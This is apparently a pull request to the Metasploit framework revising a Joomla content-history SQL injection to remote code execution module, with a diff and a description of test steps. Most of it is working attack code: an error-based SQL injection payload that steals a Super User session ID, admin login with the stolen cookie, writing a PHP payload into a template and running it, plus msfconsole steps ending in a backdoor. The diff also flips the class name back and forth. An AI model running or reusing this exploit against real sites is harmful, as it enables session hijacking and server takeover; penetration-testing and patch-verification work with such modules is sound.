### PR TITLE
Revised the SQL query for the exploits/unix/webapps/joomla_content_hi…

### DIFF
--- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient

--- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 
-class MetasploitModule < Msf::Exploit::Remote
+class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
@@ -80,7 +80,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
     # This way we make sure that's excluded and we only get real admin sessions.
 
-    sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
+    # The modified query should resolve previous issues - Michael Maturi
+
+    sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id "
 
     # Retrieve cookies
     res = send_request_cgi({
@@ -108,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
       table_prefix = $1
-      print_status("Retrieved table prefix [ #{table_prefix} ]")
+      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
     else
       fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
     end
@@ -116,11 +118,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # Retrieve the admin session using our retrieved table prefix
     res = sqli("#{table_prefix}_")
 
-    if res && res.code == 500 && res.body =~ /Duplicate entry &#039;([a-z0-9]+)&#039; for key/
-      auth_cookie_part = $1[0...-1]
-      print_status("Retrieved admin cookie [ #{auth_cookie_part} ]")
+    if res && res.code == 500 && res.body =~ /::([A-Za-z0-9]*)::/
+      auth_cookie_part = $1
+      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
+
     else
+      puts $1
+      puts 'test'
       fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
+
     end
 
     # Retrieve cookies
@@ -131,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
       cookie_begin = $1
-      print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]")
+      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
     else
       fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
     end
@@ -150,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
       })
 
     if res && res.code == 200 && res.body =~ /Administration - Control Panel/
-      print_status("Successfully authenticated as Administrator")
+      print_status("#{peer} - Successfully authenticated as Administrator")
     else
       fail_with(Failure::Unknown, "#{peer} - Session failure")
     end
@@ -178,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = rand_text_alphanumeric(rand(10)+6)
 
     # Create file
-    print_status("Creating file [ #{filename}.php ]")
+    print_status("#{peer} - Creating file [ #{filename}.php ]")
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
@@ -198,7 +204,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Grab token
     if res && res.code == 303 && res.headers['Location']
       location = res.headers['Location']
-      print_status("Following redirect to [ #{location} ]")
+      print_status("#{peer} - Following redirect to [ #{location} ]")
       res = send_request_cgi(
         'uri'    => location,
         'method' => 'GET',
@@ -208,14 +214,14 @@ class MetasploitModule < Msf::Exploit::Remote
       # Retrieving template token
       if res && res.code == 200 && res.body =~ /&amp;([a-z0-9]+)=1\">/
         token = $1
-        print_status("Token [ #{token} ] retrieved")
+        print_status("#{peer} - Token [ #{token} ] retrieved")
       else
         fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
       end
 
       if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
         template_path = $1
-        print_status("Template path [ #{template_path} ] retrieved")
+        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
       else
         fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
       end
@@ -227,7 +233,7 @@ class MetasploitModule < Msf::Exploit::Remote
     filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
 
     # Inject payload data into file
-    print_status("Insert payload into file [ #{filename}.php ]")
+    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
@@ -248,14 +254,14 @@ class MetasploitModule < Msf::Exploit::Remote
       })
 
     if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
-      print_status("Payload data inserted into [ #{filename}.php ]")
+      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
     else
       fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
     end
 
     # Request payload
     register_files_for_cleanup("#{filename}.php")
-    print_status("Executing payload")
+    print_status("#{peer} - Executing payload")
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),

--- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
@@ -123,8 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
 
     else
-      puts $1
-      puts 'test'
       fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
 
     end


### PR DESCRIPTION
## What has been changed

The SQLi payload has been modified and no longer yields a "500 - Default layout not found" error or "Subquery returns more than one row" error. 
## Requirements
1. As with the original module, this script has to be run multiple times to ensure success.
2. The **"type_id" GET parameter must also be appropriately matched to the "item_id"** GET parameter you specified. 

_Note:_ The original module uses the values 1 and 1 for these parameters. I had better success with using the values of 2, and 1 (item_id,type_id) as defaults. I did not include those changes in the modified script, as the original values will still work.
1. An admin must have an active session.
2. The directory used to upload the payload but have the proper permissions.
## Verification

_Note:_  This may take a few re-runs due to behavior of Joomla. If all 
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapps/joomla_contenthistory_sqli_rce
- [ ]  Set RHOST and TARGETURI to match Joomla location
- [ ]  Exploit
- [ ]  **Verify** A backdoor should be established with the target
